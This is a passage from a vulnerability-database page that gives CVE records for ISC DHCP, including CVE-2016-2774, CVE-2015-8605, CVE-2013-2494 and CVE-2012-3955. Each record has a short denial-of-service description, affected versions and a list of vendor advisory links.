"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "https://kb.isc.org/docs/aa-01541",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01541"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2017-3144",
"datePublished": "2019-01-16T20:00:00.000Z",
"dateReserved": "2016-12-02T00:00:00.000Z",
"dateUpdated": "2024-09-16T22:46:13.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-2774 (GCVE-0-2016-2774)
Vulnerability from nvd – Published: 2016-03-09 15:26 – Updated: 2024-08-05 23:32
VLAI?
Summary
ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Date Public ?
2016-03-07 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:32:20.980Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2016:2590",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1035196"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-01354"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-03-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-24T19:07:04.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "RHSA-2016:2590",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1035196"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-01354"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-2774",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R13 and 4.2.x and 4.3.x before 4.3.4 does not restrict the number of concurrent TCP sessions, which allows remote attackers to cause a denial of service (INSIST assertion failure or request-processing outage) by establishing many sessions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "RHSA-2016:2590",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2016-2590.html"
},
{
"name": "1035196",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1035196"
},
{
"name": "https://kb.isc.org/article/AA-01354",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-01354"
},
{
"name": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"name": "FEDORA-2016-821f013cb1",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183640.html"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "openSUSE-SU-2016:1843",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2016-07/msg00066.html"
},
{
"name": "FEDORA-2016-c93d49faf3",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-May/183458.html"
},
{
"name": "84208",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/84208"
},
{
"name": "[debian-lts-announce] 20191124 [SECURITY] [DLA 2003-1] isc-dhcp security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00023.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-2774",
"datePublished": "2016-03-09T15:26:00.000Z",
"dateReserved": "2016-02-26T00:00:00.000Z",
"dateUpdated": "2024-08-05T23:32:20.980Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-8605 (GCVE-0-2015-8605)
Vulnerability from nvd – Published: 2016-01-14 22:00 – Updated: 2024-08-06 08:20
VLAI?
Summary
ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
Date Public ?
2016-01-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T08:20:43.591Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1034657",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-01334"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-12-05T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1034657",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-01334"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-8605",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1034657",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1034657"
},
{
"name": "openSUSE-SU-2016:0610",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
},
{
"name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/",
"refsource": "CONFIRM",
"url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
},
{
"name": "https://kb.isc.org/article/AA-01334",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-01334"
},
{
"name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/",
"refsource": "CONFIRM",
"url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
},
{
"name": "FEDORA-2016-0c5bb21bf1",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
},
{
"name": "DSA-3442",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2016/dsa-3442"
},
{
"name": "USN-2868-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-2868-1"
},
{
"name": "FEDORA-2016-adb533a418",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
},
{
"name": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"name": "80703",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/80703"
},
{
"name": "openSUSE-SU-2016:0601",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-8605",
"datePublished": "2016-01-14T22:00:00.000Z",
"dateReserved": "2015-12-17T00:00:00.000Z",
"dateUpdated": "2024-08-06T08:20:43.591Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-2494 (GCVE-0-2013-2494)
Vulnerability from nvd – Published: 2013-03-28 16:00 – Updated: 2024-09-16 19:52
VLAI?
Summary
libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T15:44:31.973Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00880/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-03-28T16:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00880/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-2494",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/article/AA-00880/",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00880/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-2494",
"datePublished": "2013-03-28T16:00:00.000Z",
"dateReserved": "2013-03-07T00:00:00.000Z",
"dateUpdated": "2024-09-16T19:52:30.979Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3955 (GCVE-0-2012-3955)
Vulnerability from nvd – Published: 2012-09-14 10:00 – Updated: 2024-08-06 20:21
VLAI?
Summary
ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||
Date Public ?
2012-09-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:04.060Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "FEDORA-2012-14149",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027528"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-09-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-09-29T09:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "FEDORA-2012-14149",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027528"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3955",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "FEDORA-2012-14149",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
},
{
"name": "openSUSE-SU-2012:1252",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
},
{
"name": "USN-1571-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1571-1"
},
{
"name": "openSUSE-SU-2012:1234",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
},
{
"name": "DSA-2551",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2551"
},
{
"name": "51318",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/51318"
},
{
"name": "MDVSA-2012:153",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
},
{
"name": "FEDORA-2012-13910",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
},
{
"name": "55530",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/55530"
},
{
"name": "FEDORA-2012-14076",
"refsource": "FEDORA",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
},
{
"name": "RHSA-2013:0504",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
},
{
